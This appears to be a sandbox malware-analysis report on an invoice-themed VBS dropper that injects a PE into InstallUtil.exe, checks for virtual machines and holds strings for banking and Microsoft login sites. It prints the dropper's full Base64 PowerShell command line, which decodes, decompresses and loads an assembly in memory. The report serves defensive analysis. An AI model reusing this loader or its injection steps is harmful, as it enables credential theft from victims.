Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 0VMware|VIRTUAL|A M I|Xen4win32_process.handle='{0}'
Source: OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 9_2_04F2B440 LdrInitializeThunk, 9_2_04F2B440
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46C000 Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46E000 Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 2F1008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46C000
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 46E000
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: F21008
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\OSDescription.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "C:\Users\user\AppData\Roaming\OSDescription.vbs.exe" -enc JABGAHAAdABqAHgAcgB4AGkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQATgBrAGwAcwBlAHgAdAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEYAcAB0AGoAeAByAHgAaQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBMAGEAcwB0ACAAMQA7ACAAJABaAG8AaQBsAGUAdwBmAGMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQATgBrAGwAcwBlAHgAdAAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAWgBwAHEAbABxAGEAegBpAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFoAbwBpAGwAZQB3AGYAYwAgACkAOwAkAEQAawBtAGIAcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQASQB2AHkAZwB5AG8AcwB2ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAFoAcABxAGwAcQBhAHoAaQBhACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAG8AcAB5AFQAbwAoACAAJABEAGsAbQBiAHAAIAApADsAJABJAHYAeQBnAHkAbwBzAHYALgBDAGwAbwBzAGUAKAApADsAJABaAHAAcQBsAHEAYQB6AGkAYQAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAFoAbwBpAGwAZQB3AGYAYwAgAD0AIAAkAEQAawBtAGIAcAAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAUABtAGsAZgBxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAWgBvAGkAbABlAHcAZgBjACkAOwAgACQAWgB5AHMAeAB4AGUAeABnAHEAbwAgAD0AIAAkAFAAbQBrAGYAcQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAFoAeQBzAHgAeABlAHgAZwBxAG8ALgBOAGEAbQBlACkALgBEAHkAbgBhAG0AaQBjAEkAbgB2AG8AawBlACgAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "c:\users\user\desktop\fattura-24sc-99245969925904728562.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "c:\users\user\appdata\roaming\osdescription.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe "c:\users\user\desktop\fattura-24sc-99245969925904728562.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe "c:\users\user\appdata\roaming\osdescription.vbs.exe" -enc jabgahaadabqahgacgb4agkaiaa9acaawwbtahkacwb0aguabqauaeqaaqbhagcabgbvahmadabpagmacwauafaacgbvagmazqbzahmaxqa6adoarwblahqaqwb1ahiacgblag4adabqahiabwbjaguacwbzacgakqauae0ayqbpag4atqbvagqadqbsagualgbgagkabablae4ayqbtagualgbsaguacabsageaywblacgajwauaguaeablaccalaanaccakqa7acqatgbragwacwblahgadaagad0aiabnaguadaatagmabwbuahqazqbuahqaiaakaeyacab0agoaeabyahgaaqagahwaiabtaguabablagmadaatae8aygbqaguaywb0acaalqbmageacwb0acaamqa7acaajabaag8aaqbsaguadwbmagmaiaa9acaawwbtahkacwb0aguabqauaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoacqatgbragwacwblahgadaauafiazqbwagwayqbjaguakaanafiarqbnacaajwasacaajwanackalgbsaguacabsageaywblacgajwbaaccalaagaccaqqanackakqa7acqawgbwaheababxageaegbpageaiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4asqbpac4atqblag0abwbyahkauwb0ahiazqbhag0akaagacwaiaakafoabwbpagwazqb3agyaywagackaowakaeqaawbtagiacaagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbjae8algbnaguabqbvahiaeqbtahqacgblageabqa7acqasqb2ahkazwb5ag8acwb2acaapqagae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauaekatwauaemabwbtahaacgblahmacwbpag8abgauaecaegbpahaauwb0ahiazqbhag0aiaakafoacabxagwacqbhahoaaqbhacwaiaaoafsasqbpac4aqwbvag0acabyaguacwbzagkabwbuac4aqwbvag0acabyaguacwbzagkabwbuae0abwbkaguaxqa6adoarablagmabwbtahaacgblahmacwapadsajabjahyaeqbnahkabwbzahyalgbdag8acab5afqabwaoacaajabeagsabqbiahaaiaapadsajabjahyaeqbnahkabwbzahyalgbdagwabwbzaguakaapadsajabaahaacqbsaheayqb6agkayqauaemababvahmazqaoackaowbbagiaeqb0aguawwbdaf0aiaakafoabwbpagwazqb3agyaywagad0aiaakaeqaawbtagiacaauafqabwbbahiacgbhahkakaapadsawwbbahiacgbhahkaxqa6adoaugblahyazqbyahmazqaoacqawgbvagkabablahcazgbjackaowagacqauabtagsazgbxacaapqagafsauwb5ahmadablag0algbbahaacabeag8abqbhagkabgbdadoaogbdahuacgbyaguabgb0aeqabwbtageaaqbuac4atabvageazaaoacqawgbvagkabablahcazgbjackaowagacqawgb5ahmaeab4aguaeabnaheabwagad0aiaakafaabqbragyacqauaeuabgb0ahiaeqbqag8aaqbuahqaowagafsauwb5ahmadablag0algbeaguabablagcayqb0aguaxqa6adoaqwbyaguayqb0aguarablagwazqbnageadablacgawwbbagmadabpag8abgbdacwaiaakafoaeqbzahgaeablahgazwbxag8algbeaguaywbsageacgbpag4azwbuahkacablacwaiaakafoaeqbzahgaeablahgazwbxag8algboageabqblackalgbeahkabgbhag0aaqbjaekabgb2ag8aawblacgakqagahwaiabpahuadaatae4adqbsagwa Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
